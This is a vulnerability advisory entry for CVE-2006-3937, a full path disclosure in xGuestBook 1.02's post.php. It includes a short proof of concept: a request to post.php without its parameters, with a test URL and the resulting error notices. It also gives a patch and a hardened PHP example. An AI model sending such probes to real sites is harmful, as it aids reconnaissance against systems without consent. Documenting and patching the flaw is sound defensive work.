x_atrix xGuestBook 'post.php' Information Disclosure Vulnerability

Vulnerability ID: 1193955    Vulnerability type: Unknown
Published: 2006-07-31    Updated: 2006-07-31
CVE ID: CVE-2006-3937    CNNVD-ID: CNNVD-200607-508
Platform: N/A    CVSS score: 5.0
|Sources
https://www.securityfocus.com/bid/82967
https://cxsecurity.com/issue/WLB-2006080013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-508
|Details
post.php in x_atrix xGuestBook 1.02 allows remote attackers to obtain sensitive information via a request that omits the (1) user, (2) mail, (3) p, or (4) url parameter, which causes the installation path to be displayed in an error message.
|Exploit
###################Dicomdk####################
Full Path Disclosure xGuestBook v1.02        #
                                             #
http://xatrix.xa.funpic.de/xguestbook2/      #
                                             #
By : X-boy                                   #
##############################################

http://[HOST]/post.php

Test : http://xatrix.xa.funpic.de/xguestbook2/post.php

Result :
========
Notice: Undefined index: user in [site]\post.php on line 15
Notice: Undefined index: mail in [site]\post.php on line 16
Notice: Undefined index: p in [site]\post.php on line 17
Notice: Undefined index: url in [site]\post.php on line 19

##############################################
Patch :                                      #
##############################################

-Open post.php

-Find :

$user  = HTMLSPECIALCHARS(trim($_POST['user']));
$email = HTMLSPECIALCHARS(trim($_POST['mail']));
$post  = nl2br(HTMLSPECIALCHARS($_POST['p']));
$post  = str_replace("  "," ",$post);
$url   = HTMLSPECIALCHARS(trim($_POST['url']));
$date  = date("Y-m-d g:i:s");

-Change to :

if (isset($_POST['user']) AND isset($_POST['mail']) AND isset($_POST['p']) AND isset($_POST['url']))
{
    $user  = HTMLSPECIALCHARS(trim($_POST['user']));
    $email = HTMLSPECIALCHARS(trim($_POST['mail']));
    $post  = nl2br(HTMLSPECIALCHARS($_POST['p']));
    $post  = str_replace("  "," ",$post);
    $url   = HTMLSPECIALCHARS(trim($_POST['url']));
    $date  = date("Y-m-d g:i:s");
}

##############################################
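The advisory's patch only guards the assignments; if the isset() test fails, the variables stay undefined for whatever the rest of post.php does with them, and any notice PHP raises there would still carry the file path if display_errors is on. The following is an added example, not xGuestBook's own code, of handling the same four POST fields so that an incomplete request gets a generic 400 response and PHP diagnostics go to the log rather than the browser. The function name read_guestbook_post is an assumption.

```php
<?php
// Added example (not xGuestBook's own code): hardened handling of the
// POST fields that post.php in xGuestBook 1.02 read without checking
// that they were present.

// Keep PHP notices/warnings out of HTTP responses; log them instead.
// This is the setting that stops a stray notice from revealing the path.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Returns the trimmed, HTML-escaped values of the required fields, or
// null if any of them is missing, without ever reading an undefined index.
function read_guestbook_post(array $post): ?array
{
    $required = ['user', 'mail', 'p', 'url'];
    foreach ($required as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
    }
    $entry = [
        'user'  => htmlspecialchars(trim($post['user']), ENT_QUOTES, 'UTF-8'),
        'email' => htmlspecialchars(trim($post['mail']), ENT_QUOTES, 'UTF-8'),
        'post'  => nl2br(htmlspecialchars($post['p'], ENT_QUOTES, 'UTF-8')),
        'url'   => htmlspecialchars(trim($post['url']), ENT_QUOTES, 'UTF-8'),
        'date'  => date('Y-m-d g:i:s'),
    ];
    // Same double-space collapse the original post.php applied.
    $entry['post'] = str_replace('  ', ' ', $entry['post']);
    return $entry;
}

$entry = read_guestbook_post($_POST);
if ($entry === null) {
    // Generic response: no file path, no PHP diagnostic text.
    http_response_code(400);
    exit('Missing required form fields.');
}
// Continue with $entry['user'], $entry['email'], $entry['post'], etc.
```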
|Affected products
Xguestbook Xguestbook 1.02
|References

Source: XF
Name: xguestbook-post-path-disclosure(27979)
Link: http://xforce.iss.net/xforce/xfdb/27979
Source: BUGTRAQ
Name: 20060725 Full Path Disclosure xGuestBook v1.02
Link: http://www.securityfocus.com/archive/1/archive/1/441170/100/0/threaded
Source: SREASON
Name: 1304
Link: http://securityreason.com/securityalert/1304